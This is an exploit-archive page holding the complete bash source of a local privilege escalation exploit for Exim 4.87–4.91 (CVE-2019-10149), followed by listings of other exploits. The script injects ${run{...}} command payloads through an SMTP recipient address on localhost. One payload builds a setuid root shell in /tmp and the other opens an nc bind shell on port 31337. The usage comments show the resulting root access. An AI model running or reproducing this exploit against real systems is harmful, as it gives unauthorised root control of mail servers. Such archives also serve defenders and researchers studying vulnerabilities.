Search for hundreds of thousands of exploits

"Exim 4.87 - 4.91 - Local Privilege Escalation"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

linux

Release date

Exploit published date

2019-06-17

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive). 
# Improper validation of recipient address in deliver_message() 
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return 
# of the WIZard" vulnerability reported by the Qualys Security 
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
	echo "$0 [-m METHOD]"
	echo
	echo "-m setuid : use the setuid payload (default)"
	echo "-m netcat : use the netcat payload"
	echo
	exit 1
}

# payload delivery
function exploit()
{
	# connect to localhost:25
	exec 3<>/dev/tcp/localhost/25

	# deliver the payload
	read -u 3 && echo $REPLY
	echo "helo localhost" >&3
	read -u 3 && echo $REPLY
	echo "mail from:<>" >&3
	read -u 3 && echo $REPLY
	echo "rcpt to:<$PAYLOAD>" >&3
	read -u 3 && echo $REPLY
	echo "data" >&3
	read -u 3 && echo $REPLY
	for i in {1..31}
	do
		echo "Received: $i" >&3
	done
	echo "." >&3
	read -u 3 && echo $REPLY
	echo "quit" >&3
	read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
while [ ! -z "$1" ]; do
	case $1 in
		-m) shift; METHOD="$1"; shift;;
		* ) usage
		;;
	esac
done
if [ -z $METHOD ]; then
	usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

	# prepare a setuid shell helper to circumvent bash checks
	echo "Preparing setuid shell helper..."
	echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
	gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
	if [ $? -ne 0 ]; then
		echo "Problems compiling setuid shell helper, check your gcc."
		echo "Falling back to the /bin/sh method."
		cp /bin/sh /tmp/pwned
	fi
	echo

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_SETUID
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	ls -l /tmp/pwned
	/tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

	# select and deliver the payload
	echo "Delivering $METHOD payload..."
	PAYLOAD=$PAYLOAD_NETCAT
	exploit
	echo

	# wait for the magic to happen and spawn our shell
	echo "Waiting 5 seconds..."
	sleep 5
	nc -v 127.0.0.1 31337

# print help
else
	usage
fi
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2020-04-21 "Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation" local solaris "Marco Ivaldi"
2020-02-11 "OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution" remote freebsd "Marco Ivaldi"
2020-01-16 "SunOS 5.10 Generic_147148-26 - Local Privilege Escalation" local multiple "Marco Ivaldi"
2019-10-21 "Solaris 11.4 - xscreensaver Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-16 "Solaris xscreensaver 11.4 - Privilege Escalation" local solaris "Marco Ivaldi"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-11-30 "xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation" local openbsd "Marco Ivaldi"
2018-10-30 "xorg-x11-server 1.20.3 - Privilege Escalation" local openbsd "Marco Ivaldi"
2009-09-11 "IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug" local aix "Marco Ivaldi"
2008-03-10 "Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak" local solaris "Marco Ivaldi"
2007-04-04 "TrueCrypt 4.3 - 'setuid' Local Privilege Escalation" local windows "Marco Ivaldi"
2007-02-13 "Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack" remote multiple "Marco Ivaldi"
2007-02-13 "Lotus Domino R6 Webmail - Remote Password Hash Dumper" remote windows "Marco Ivaldi"
2007-02-06 "MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution" remote windows "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'extproc' Local/Remote Command Execution" remote multiple "Marco Ivaldi"
2006-12-19 "Oracle 9i/10g - 'utl_file' FileSystem Access" remote linux "Marco Ivaldi"
2006-11-23 "Oracle 9i/10g - 'read/write/execute' ation Suite" remote multiple "Marco Ivaldi"
2006-10-24 "Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)" local solaris "Marco Ivaldi"
2006-10-24 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-16 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)" local solaris "Marco Ivaldi"
2006-10-13 "Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-10-13 "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2006-09-13 "X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)" local solaris "Marco Ivaldi"
2006-08-22 "Solaris 8/9 - '/usr/ucb/ps' Local Information Leak" local solaris "Marco Ivaldi"
2006-07-18 "Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation" local linux "Marco Ivaldi"
import requests
response = requests.get('http://127.0.0.1:8181/api/v1/exploitdetails/46996/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.